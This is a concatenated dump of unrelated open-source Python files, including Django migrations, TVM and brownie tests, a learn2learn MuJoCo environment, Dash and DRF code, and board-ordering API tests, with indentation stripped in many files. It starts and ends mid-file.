self.assertAllClose([[0, 0.61, 0.39, 0, 0],
[0, 0, 0, 0.97, 0.03],
[0, 0, 0, 0, 1]], encoded, atol=0.01)
self.assertAllClose([-0.5, 0.9, 2.0], encoder.decode(encoded), atol=0.001)
if __name__ == '__main__':
tf.test.main()
|
mod_pbxproj.py
|
xwf20050250/mod-pbxproj
| 991 |
69770
|
# MIT License
#
# Copyright (c) 2016 <NAME> aka kronenthaler
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This is a backwards-compatibility file. For Unity developers this is the only file that needs to be added to the Unity
# project.
# At run-time, this file installs the pbxproj package into the user's local Python packages if it is not already present.
# Afterwards, it imports all necessary modules so that the developer's existing scripts keep working as before.
from setuptools import setup
import site
try:
    from importlib import reload  # Python 3; on Python 2, reload() is a builtin
except ImportError:
    pass
__author__ = 'kronenthaler'
__version__ = '2.0.1'
__package_name__ = 'mod_pbxproj_installer'
try:
# check if file exists
from pbxproj import XcodeProject
except ImportError:
# install it if not present
print('Installing package...')
setup(name=__package_name__,
license='MIT License',
install_requires=['pbxproj'],
script_args=['install', '--user', '--force', '--record', '.uninstall_files'])
# force the refresh of the packages
reload(site)
# import publicly
from pbxproj import *
|
usaspending_api/accounts/migrations/0001_initial.py
|
g4brielvs/usaspending-api
| 217 |
69777
|
<filename>usaspending_api/accounts/migrations/0001_initial.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-10-11 16:17
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
from usaspending_api.common.helpers.generic_helper import FY_PG_FUNCTION_DEF
class Migration(migrations.Migration):
initial = True
dependencies = [
('submissions', '0001_initial'),
('references', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AppropriationAccountBalances',
fields=[
('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
('appropriation_account_balances_id', models.AutoField(primary_key=True, serialize=False)),
('budget_authority_unobligated_balance_brought_forward_fyb', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('adjustments_to_unobligated_balance_brought_forward_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('budget_authority_appropriated_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('borrowing_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('contract_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('spending_authority_from_offsetting_collections_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('other_budgetary_resources_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('total_budgetary_resources_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('gross_outlay_amount_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('deobligations_recoveries_refunds_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('unobligated_balance_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('status_of_budgetary_resources_total_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('obligations_incurred_total_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('drv_appropriation_availability_period_start_date', models.DateField(blank=True, null=True)),
('drv_appropriation_availability_period_end_date', models.DateField(blank=True, null=True)),
('drv_appropriation_account_expired_status', models.TextField(blank=True, null=True)),
('drv_obligations_unpaid_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('drv_other_obligated_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('reporting_period_start', models.DateField(blank=True, null=True)),
('reporting_period_end', models.DateField(blank=True, null=True)),
('last_modified_date', models.DateField(blank=True, null=True)),
('certified_date', models.DateField(blank=True, null=True)),
('create_date', models.DateTimeField(auto_now_add=True, null=True)),
('update_date', models.DateTimeField(auto_now=True, null=True)),
('final_of_fy', models.BooleanField(db_index=True, default=False)),
('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='submissions.SubmissionAttributes')),
],
options={
'db_table': 'appropriation_account_balances',
'managed': True,
},
),
migrations.CreateModel(
name='AppropriationAccountBalancesQuarterly',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
('budget_authority_unobligated_balance_brought_forward_fyb', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('adjustments_to_unobligated_balance_brought_forward_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('budget_authority_appropriated_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('borrowing_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('contract_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('spending_authority_from_offsetting_collections_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('other_budgetary_resources_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('total_budgetary_resources_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('gross_outlay_amount_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('deobligations_recoveries_refunds_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('unobligated_balance_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('status_of_budgetary_resources_total_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('obligations_incurred_total_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('create_date', models.DateTimeField(auto_now_add=True, null=True)),
('update_date', models.DateTimeField(auto_now=True, null=True)),
('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='submissions.SubmissionAttributes')),
],
options={
'db_table': 'appropriation_account_balances_quarterly',
'managed': True,
},
),
migrations.CreateModel(
name='BudgetAuthority',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('agency_identifier', models.TextField(db_index=True)),
('fr_entity_code', models.TextField(db_index=True, null=True)),
('year', models.IntegerField()),
('amount', models.BigIntegerField(null=True)),
],
options={
'db_table': 'budget_authority',
},
),
migrations.CreateModel(
name='FederalAccount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('agency_identifier', models.TextField(db_index=True)),
('main_account_code', models.TextField(db_index=True)),
('account_title', models.TextField()),
('federal_account_code', models.TextField(null=True)),
],
options={
'db_table': 'federal_account',
'managed': True,
},
),
migrations.CreateModel(
name='TreasuryAppropriationAccount',
fields=[
('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
('treasury_account_identifier', models.AutoField(primary_key=True, serialize=False)),
('tas_rendering_label', models.TextField(blank=True, null=True)),
('allocation_transfer_agency_id', models.TextField(blank=True, null=True)),
('agency_id', models.TextField()),
('beginning_period_of_availability', models.TextField(blank=True, null=True)),
('ending_period_of_availability', models.TextField(blank=True, null=True)),
('availability_type_code', models.TextField(blank=True, null=True)),
('availability_type_code_description', models.TextField(blank=True, null=True)),
('main_account_code', models.TextField()),
('sub_account_code', models.TextField()),
('account_title', models.TextField(blank=True, null=True)),
('reporting_agency_id', models.TextField(blank=True, null=True)),
('reporting_agency_name', models.TextField(blank=True, null=True)),
('budget_bureau_code', models.TextField(blank=True, null=True)),
('budget_bureau_name', models.TextField(blank=True, null=True)),
('fr_entity_code', models.TextField(blank=True, null=True)),
('fr_entity_description', models.TextField(blank=True, null=True)),
('budget_function_code', models.TextField(blank=True, null=True)),
('budget_function_title', models.TextField(blank=True, null=True)),
('budget_subfunction_code', models.TextField(blank=True, null=True)),
('budget_subfunction_title', models.TextField(blank=True, null=True)),
('drv_appropriation_availability_period_start_date', models.DateField(blank=True, null=True)),
('drv_appropriation_availability_period_end_date', models.DateField(blank=True, null=True)),
('drv_appropriation_account_expired_status', models.TextField(blank=True, null=True)),
('create_date', models.DateTimeField(auto_now_add=True, null=True)),
('update_date', models.DateTimeField(auto_now=True, null=True)),
('internal_start_date', models.DateField(blank=True, null=True)),
('internal_end_date', models.DateField(blank=True, null=True)),
('awarding_toptier_agency', models.ForeignKey(help_text='The toptier agency object associated with the ATA', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='tas_ata', to='references.ToptierAgency')),
('federal_account', models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.FederalAccount')),
('funding_toptier_agency', models.ForeignKey(help_text='The toptier agency object associated with the AID', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='tas_aid', to='references.ToptierAgency')),
],
options={
'db_table': 'treasury_appropriation_account',
'managed': True,
},
),
migrations.AlterUniqueTogether(
name='federalaccount',
unique_together=set([('agency_identifier', 'main_account_code')]),
),
migrations.AlterUniqueTogether(
name='budgetauthority',
unique_together=set([('agency_identifier', 'fr_entity_code', 'year')]),
),
migrations.AddField(
model_name='appropriationaccountbalancesquarterly',
name='treasury_account_identifier',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accounts.TreasuryAppropriationAccount'),
),
migrations.AddField(
model_name='appropriationaccountbalances',
name='treasury_account_identifier',
field=models.ForeignKey(db_column='treasury_account_identifier', on_delete=django.db.models.deletion.CASCADE, related_name='account_balances', to='accounts.TreasuryAppropriationAccount'),
),
migrations.RunSQL(sql=[FY_PG_FUNCTION_DEF]),
]
|
coapthon/resources/remoteResource.py
|
urbas/CoAPthon3
| 237 |
69793
|
<reponame>urbas/CoAPthon3
from coapthon.resources.resource import Resource
__author__ = '<NAME>'
class RemoteResource(Resource):
def __init__(self, name, remote_server, remote_path, coap_server=None, visible=True, observable=True, allow_children=True):
super(RemoteResource, self).__init__(name, coap_server, visible=visible, observable=observable,
allow_children=allow_children)
self.remote_path = remote_path
self.remote_server = remote_server
|
tests/python/unittest/test_pass_vectorize.py
|
mingwayzhang/tvm
| 286 |
69820
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
def test_vectorize_loop():
dtype = 'int64'
n = tvm.var('n')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, n) as i:
with ib.for_range(0, 4, for_type="vectorize") as j:
A[j] = tvm.const(1, A.dtype)
stmt = ib.get()
assert isinstance(stmt.body, tvm.stmt.For)
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
assert not isinstance(stmt.body, tvm.stmt.For)
assert isinstance(stmt.body.index, tvm.expr.Ramp)
assert isinstance(stmt.body.value, tvm.expr.Broadcast)
def test_vectorize_vector():
dtype = 'int64'
n = tvm.var('n')
ib = tvm.ir_builder.create()
A = ib.pointer("float32x4", name="A")
with ib.for_range(0, n) as i:
with ib.for_range(0, 4, for_type="vectorize") as j:
A[j] = tvm.const(1, A.dtype)
stmt = ib.get()
assert isinstance(stmt.body, tvm.stmt.For)
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
assert not isinstance(stmt.body, tvm.stmt.For)
assert isinstance(stmt.body.index, tvm.expr.Ramp)
assert isinstance(stmt.body.value, tvm.expr.Broadcast)
def test_vectorize_with_if():
n = tvm.var('n')
x = tvm.var('x')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, 4, for_type="vectorize") as i:
with ib.if_scope(x < n):
A[i] = A[i] + 1
with ib.else_scope():
with ib.if_scope(i < n):
A[i] = 2.0
stmt = ib.get()
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.IfThenElse)
assert isinstance(stmt.then_case.index, tvm.expr.Ramp)
assert isinstance(stmt.then_case.value, tvm.expr.Add)
assert stmt.then_case.value.dtype == "float32x4"
assert isinstance(stmt.else_case, tvm.stmt.For)
def test_vectorize_with_le_cond():
n = tvm.var('n')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, 4, for_type="vectorize") as i:
with ib.if_scope(i <= n):
A[i] = A[i] + 1
stmt = ib.get()
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
def test_vectorize_with_ge_cond():
n = tvm.var('n')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, 4, for_type="vectorize") as i:
with ib.if_scope(i >= n):
A[i] = A[i] + 1
stmt = ib.get()
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
def test_vectorize_if_then_else():
n = tvm.var('n')
x = tvm.var('x')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, 4, for_type="vectorize") as i:
A[i] = tvm.call_intrin("float32", "tvm_if_then_else",
i > 0,
A[i] + 1, A[i])
stmt = ib.get()
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, n) as k:
with ib.for_range(0, 4, for_type="vectorize") as i:
A[k * 4 + i] = tvm.call_intrin("float32", "tvm_if_then_else",
k > 0,
A[k * 4 + i], 0)
stmt = ib.get()
assert isinstance(stmt.body, tvm.stmt.For)
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert not isinstance(stmt.body, tvm.stmt.For)
assert isinstance(stmt.body.value.args[2], tvm.expr.Broadcast)
if __name__ == "__main__":
test_vectorize_vector()
test_vectorize_with_if()
test_vectorize_loop()
test_vectorize_if_then_else()
test_vectorize_with_le_cond()
test_vectorize_with_ge_cond()
|
python_code/hash_chapter1_reimpl_js.py
|
possnfiffer/inside_python_dict
| 124 |
69826
|
from js_reimpl_common import run_op_chapter1_chapter2
def run_op(keys, op, **kwargs):
return run_op_chapter1_chapter2("chapter1", None, keys, op, **kwargs)
def create_new(numbers):
return run_op(None, "create_new", array=numbers)
def create_new_broken(numbers):
return run_op(None, "create_new_broken", array=numbers)
def has_key(keys, key):
return run_op(keys, "has_key", key=key)
def linear_search(numbers, key):
return run_op(None, "linear_search", key=key, array=numbers)
|
noisemaker/effects_registry.py
|
Kulinark/py-noisemaker
| 106 |
69832
|
<reponame>Kulinark/py-noisemaker<gh_stars>100-1000
"""Effect decorator for Noisemaker Composer Presets"""
import inspect
EFFECTS = {}
def effect(*args):
"""Function decorator for declaring composable effects."""
def decorator_fn(func):
argspec = inspect.getfullargspec(func)
params = argspec.args
for param in ["time", "speed"]:
if param not in params:
raise ValueError(f'{func.__name__}() needs to accept a "{param}" keyword arg. Please add it to the function signature.')
# All effects respond to "tensor", "shape". Removing these non-keyword args should make params the same length as defaults.
params.remove("tensor")
params.remove("shape")
if params and len(params) != len(argspec.defaults):
raise ValueError(f'Expected {len(argspec.defaults)} keyword params to "{func.__name__}", but got {len(params)}.')
# Register effect name and params
name = args[0] if args else func.__name__
EFFECTS[name] = dict((params[i], argspec.defaults[i]) for i in range(len(params)))
EFFECTS[name]["func"] = func
return func
return decorator_fn
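# --- Illustrative sketch (hedged) ------------------------------------------------
# Declaring a composable effect with the decorator above: the function must take
# "tensor" and "shape", accept "time" and "speed" keyword args, and give a default
# to every other keyword param. "example_identity" and "intensity" are made-up
# names; this effect simply returns the tensor unchanged.
@effect("example_identity")
def example_identity(tensor, shape, intensity=1.0, time=0.0, speed=1.0):
    return tensor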
|
tests/network/transaction/test_required_confirmations.py
|
ActorForth/brownie
| 1,595 |
69837
|
import threading
import time
import pytest
import brownie
def send_and_wait_for_tx():
tx = brownie.accounts[0].transfer(
brownie.accounts[1], "0.1 ether", required_confs=0, silent=True
)
tx.wait(2)
assert tx.confirmations >= 2
assert tx.status == 1
@pytest.fixture
def block_time_network(devnetwork, config, network_name):
"""Provide a network with fixed block mining time of 1 second."""
config.networks[network_name]["cmd_settings"]["block_time"] = 1
devnetwork.disconnect()
devnetwork.connect(network_name)
yield devnetwork
devnetwork.disconnect()
def test_required_confirmations_deploy(accounts, BrownieTester, block_time_network, web3):
block = web3.eth.block_number
accounts[0].deploy(BrownieTester, True, required_confs=3)
assert web3.eth.block_number - block >= 3
def test_required_confirmations_transfer(accounts, block_time_network, web3):
block = web3.eth.block_number
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=3)
assert tx.confirmations >= 3
assert web3.eth.block_number - block >= 3
def test_required_confirmations_transact(accounts, BrownieTester, block_time_network, web3):
block = web3.eth.block_number
brownieTester = BrownieTester.deploy(True, {"from": accounts[0], "required_confs": 2})
assert web3.eth.block_number - block >= 2
block = web3.eth.block_number
tx = brownieTester.doNothing({"from": accounts[0], "required_confs": 4})
assert tx.confirmations >= 4
assert web3.eth.block_number - block >= 4
def test_required_confirmations_zero(accounts, block_time_network, web3):
block = web3.eth.block_number
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=0)
assert tx.status == -1
assert web3.eth.block_number - block == 0
time.sleep(1.5)
assert tx.status == 1
assert tx.confirmations >= 1
def test_wait_for_confirmations(accounts, block_time_network):
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=1)
tx.wait(3)
assert tx.confirmations in [3, 4]
tx.wait(2)
tx.wait(5)
assert tx.confirmations >= 5
def test_pending_nonce(accounts, block_time_network):
for _ in range(3):
accounts[0].transfer(accounts[1], "0.1 ether", required_confs=0, silent=True)
assert accounts[0]._pending_nonce() == 3
assert accounts[0].nonce < 3
time.sleep(3.5)
assert accounts[0].nonce == 3
def test_multithreading(accounts, history, block_time_network):
threads = []
for _ in range(3):
thread = threading.Thread(target=send_and_wait_for_tx, daemon=True)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
for tx in history:
assert tx.status == 1
assert tx.confirmations >= 2
|
setup.py
|
annlor/energy-usage
| 141 |
69855
|
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
NAME = "energyusage"
VERSION = "0.0.13"
DESCRIPTION = "Measuring the environmental impact of computation"
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = "https://github.com/responsibleproblemsolving/energy-usage"
AUTHOR = "<NAME>, <NAME>, <NAME>"
AUTHOR_EMAIL = "<EMAIL>"
LICENSE = "Apache 2.0"
CLASSIFIERS = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
]
PACKAGES = ['energyusage']
PACKAGE_DATA = {
'energyusage.data.csv' : ['*.csv'],
'energyusage.data.json' : ['*.json']
}
INCLUDE_PACKAGE_DATA = True
PACKAGE_DIR = {
'energyusage.data' : 'data'
}
INSTALL_REQUIRES = [
'requests',
'reportlab'
]
setup(
name= NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type = LONG_DESCRIPTION_CONTENT_TYPE,
url=URL,
author=AUTHOR,
author_email = AUTHOR_EMAIL,
license = LICENSE,
classifiers=CLASSIFIERS,
packages = PACKAGES,
package_data = PACKAGE_DATA,
include_package_data = INCLUDE_PACKAGE_DATA,
package_dir = PACKAGE_DIR,
install_requires=INSTALL_REQUIRES
)
|
learn2learn/gym/envs/mujoco/humanoid_direction.py
|
Brikwerk/learn2learn
| 1,774 |
69866
|
<gh_stars>1000+
#!/usr/bin/env python3
import gym
import numpy as np
from gym.error import DependencyNotInstalled
try:
from gym.envs.mujoco.mujoco_env import MujocoEnv
except DependencyNotInstalled:
from learn2learn.gym.envs.mujoco.dummy_mujoco_env import MujocoEnv
from learn2learn.gym.envs.meta_env import MetaEnv
def mass_center(model, sim):
mass = np.expand_dims(model.body_mass, 1)
xpos = sim.data.xipos
return (np.sum(mass * xpos, 0) / np.sum(mass))
class HumanoidDirectionEnv(MetaEnv, MujocoEnv, gym.utils.EzPickle):
"""
[[Source]](https://github.com/learnables/learn2learn/blob/master/learn2learn/gym/envs/mujoco/humanoid_direction.py)
**Description**
This environment requires the humanoid to learn to run in a random direction in the
XY plane. At each time step the humanoid receives a signal composed of a
control cost and a reward equal to its average velocity in the target direction.
The tasks are 2d-arrays sampled uniformly along the unit circle.
The target direction is indicated by the vector from the origin to the sampled point.
The velocity is calculated as the distance (in the target direction) of the humanoid's torso
position before and after taking the specified action divided by a small value dt.
A small positive bonus is added to the reward to stop the humanoid from
prematurely ending the episode.
**Credit**
Adapted from <NAME>' implementation.
**References**
1. Finn et al. 2017. "Model-Agnostic Meta-Learning for Fast Adaptation of Deep Networks." arXiv [cs.LG].
2. Rothfuss et al. 2018. "ProMP: Proximal Meta-Policy Search." arXiv [cs.LG].
"""
def __init__(self, task=None):
MetaEnv.__init__(self, task)
MujocoEnv.__init__(self, 'humanoid.xml', 5)
gym.utils.EzPickle.__init__(self)
# -------- MetaEnv Methods --------
def set_task(self, task):
MetaEnv.set_task(self, task)
self.goal_direction = task['direction']
def sample_tasks(self, num_tasks):
directions = np.random.normal(size=(num_tasks, 2))
directions /= np.linalg.norm(directions, axis=1)[..., np.newaxis]
tasks = [{'direction': direction} for direction in directions]
return tasks
# -------- Mujoco Methods --------
def _get_obs(self):
data = self.sim.data
return np.concatenate([data.qpos.flat[2:],
data.qvel.flat,
data.cinert.flat,
data.cvel.flat,
data.qfrc_actuator.flat,
data.cfrc_ext.flat])
def viewer_setup(self):
self.viewer.cam.trackbodyid = 1
self.viewer.cam.distance = self.model.stat.extent * 1.0
self.viewer.cam.elevation = -20
def reset_model(self):
c = 0.01
self.set_state(
self.init_qpos + self.np_random.uniform(low=-c, high=c, size=self.model.nq),
self.init_qvel + self.np_random.uniform(low=-c, high=c, size=self.model.nv, )
)
return self._get_obs()
# -------- Gym Methods --------
def step(self, action):
pos_before = np.copy(mass_center(self.model, self.sim)[:2])
self.do_simulation(action, self.frame_skip)
pos_after = mass_center(self.model, self.sim)[:2]
alive_bonus = 5.0
data = self.sim.data
lin_vel_cost = 0.25 * np.sum(self.goal_direction * (pos_after - pos_before)) / self.model.opt.timestep
quad_ctrl_cost = 0.1 * np.square(data.ctrl).sum()
quad_impact_cost = .5e-6 * np.square(data.cfrc_ext).sum()
quad_impact_cost = min(quad_impact_cost, 10)
reward = lin_vel_cost - quad_ctrl_cost - quad_impact_cost + alive_bonus
qpos = self.sim.data.qpos
done = bool((qpos[2] < 1.0) or (qpos[2] > 2.0))
return self._get_obs(), reward, done, dict(reward_linvel=lin_vel_cost,
reward_quadctrl=-quad_ctrl_cost,
reward_alive=alive_bonus,
reward_impact=-quad_impact_cost)
def reset(self, *args, **kwargs):
MujocoEnv.reset(self, *args, **kwargs)
return self._get_obs()
def render(self, mode='human'):
if mode == 'rgb_array':
self._get_viewer(mode).render()
# window size used for old mujoco-py:
width, height = 500, 500
data = self._get_viewer(mode).read_pixels(width,
height,
depth=False)
return data
elif mode == 'human':
self._get_viewer(mode).render()
if __name__ == '__main__':
env = HumanoidDirectionEnv()
for task in [env.get_task(), env.sample_tasks(1)[0]]:
env.set_task(task)
env.reset()
action = env.action_space.sample()
env.step(action)
|
api/v2/views/provider_type.py
|
simpsonw/atmosphere
| 197 |
69882
|
from core.models import ProviderType
from api.v2.serializers.details import ProviderTypeSerializer
from api.v2.views.base import AuthModelViewSet
class ProviderTypeViewSet(AuthModelViewSet):
"""
API endpoint that allows instance actions to be viewed or edited.
"""
queryset = ProviderType.objects.all()
serializer_class = ProviderTypeSerializer
http_method_names = ['get', 'head', 'options', 'trace']
|
docs/demos/theme_explorer/form.py
|
glsdown/dash-bootstrap-components
| 776 |
69883
|
import dash_bootstrap_components as dbc
from dash import html
from .util import make_subheading
form = html.Div(
[
make_subheading("Form", "form"),
dbc.Form(
[
html.Div(
[
dbc.Label("Username"),
dbc.Input(
placeholder="Enter your username",
type="text",
),
dbc.FormText(
[
"Can't remember your username? ",
html.A(
"Click here.",
href="#",
className="text-muted",
style={"textDecoration": "underline"},
),
]
),
]
),
html.Div(
[
dbc.Label("Username"),
dbc.Input(
placeholder="Enter your password",
type="password",
),
dbc.FormText(
[
"Can't remember your password? ",
html.A(
"Click here.",
href="#",
className="text-muted",
style={"textDecoration": "underline"},
),
]
),
]
),
]
),
],
className="mb-4",
)
|
backend/boards/tests/test_api.py
|
aibek79/Django-React-knboard
| 665 |
69909
|
import pytest
from django.contrib.auth import get_user_model
from rest_framework.reverse import reverse
from boards.models import Column, Board, Task
User = get_user_model()
@pytest.fixture
def board(create_user):
user = create_user()
uni_board = Board.objects.create(name="University", owner=user)
uni_board.members.add(user)
return uni_board
@pytest.fixture
def col_backlog(board):
return Column.objects.create(board=board, title="Backlog", column_order=1)
@pytest.fixture
def col_done(board):
return Column.objects.create(board=board, title="Done", column_order=2)
def test_order_columns(api_client_with_credentials, col_backlog, col_done):
"""
Order columns:
Backlog, Done -> Done, Backlog
"""
response = api_client_with_credentials.post(
reverse("sort-column"), {"order": [col_done.id, col_backlog.id]}
)
col_backlog.refresh_from_db()
col_done.refresh_from_db()
assert response.status_code == 200
assert col_done.column_order == 1
assert col_backlog.column_order == 2
def test_order_tasks_same_column(
api_client_with_credentials, column_factory, task_factory
):
"""
Order tasks (in one column):
Task1, Task2, Task3 -> Task3, Task1, Task2
"""
column = column_factory()
task1 = task_factory(column=column, task_order=1)
task2 = task_factory(column=column, task_order=2)
task3 = task_factory(column=column, task_order=3)
# Initial state
column.refresh_from_db()
assert list(column.tasks.all()) == [task1, task2, task3]
response = api_client_with_credentials.post(
reverse("sort-task"),
{
"board": column.board.id,
"tasks": {column.id: [task3.id, task1.id, task2.id]},
"order": [task3.id, task1.id, task2.id],
},
)
assert response.status_code == 200
# State after ordering
column.refresh_from_db()
assert list(column.tasks.all()) == [task3, task1, task2]
def test_order_tasks_between_two_columns(
api_client_with_credentials, board_factory, column_factory, task_factory
):
"""
Order tasks between two columns:
Column1: Task1, Task2, Task3
Column2: Task4, Task5
After order:
Column1: Task1, Task3
Column2: Task4, Task2, Task5
"""
board = board_factory()
column1 = column_factory(board=board)
column2 = column_factory(board=board)
task1 = task_factory(column=column1, task_order=1)
task2 = task_factory(column=column1, task_order=2)
task3 = task_factory(column=column1, task_order=3)
task4 = task_factory(column=column2, task_order=4)
task5 = task_factory(column=column2, task_order=5)
# Initial state
column1.refresh_from_db()
column2.refresh_from_db()
assert list(column1.tasks.all()) == [task1, task2, task3]
assert list(column2.tasks.all()) == [task4, task5]
response = api_client_with_credentials.post(
reverse("sort-task"),
{
"board": column1.board.id,
"tasks": {
column1.id: [task1.id, task3.id],
column2.id: [task4.id, task2.id, task5.id],
},
"order": [task1.id, task3.id, task4.id, task2.id, task5.id],
},
)
assert response.status_code == 200
# State after ordering
column1.refresh_from_db()
column2.refresh_from_db()
assert list(column1.tasks.all()) == [task1, task3]
assert list(column2.tasks.all()) == [task4, task2, task5]
def test_invalid_move_atomic(
api_client_with_credentials, board_factory, column_factory, task_factory
):
board = board_factory()
col1 = column_factory(board=board)
col2 = column_factory(board=board)
col3 = column_factory(board=board)
col1_task = task_factory(column=col1, task_order=1)
col2_task = task_factory(column=col2, task_order=2)
response = api_client_with_credentials.post(
reverse("sort-task"),
{
"board": board.id,
"tasks": {
col1.id: [col1_task.id, col2_task.id],
col3.id: [col1_task.id, col2_task.id],
},
"order": [col1_task.id, col2_task.id],
},
)
assert response.status_code == 400
# State should remain the same
col1.refresh_from_db()
col2.refresh_from_db()
col3.refresh_from_db()
assert list(col1.tasks.all()) == [col1_task]
assert list(col2.tasks.all()) == [col2_task]
assert list(col3.tasks.all()) == []
def test_can_not_order_tasks_between_two_boards(
api_client_with_credentials, board_factory, column_factory, task_factory
):
board1 = board_factory()
board2 = board_factory()
board1_col = column_factory(board=board1)
board2_col = column_factory(board=board2)
board1_task = task_factory(column=board1_col, task_order=1)
board2_task = task_factory(column=board2_col, task_order=2)
response = api_client_with_credentials.post(
reverse("sort-task"),
{
"board": board1.id,
"tasks": {
board1_col.id: [],
board2_col.id: [board1_task.id, board2_task.id],
},
"order": [board1_task.id, board2_task.id],
},
)
assert response.status_code == 400
def test_order_duplicate(api_client_with_credentials, col_done):
response = api_client_with_credentials.post(
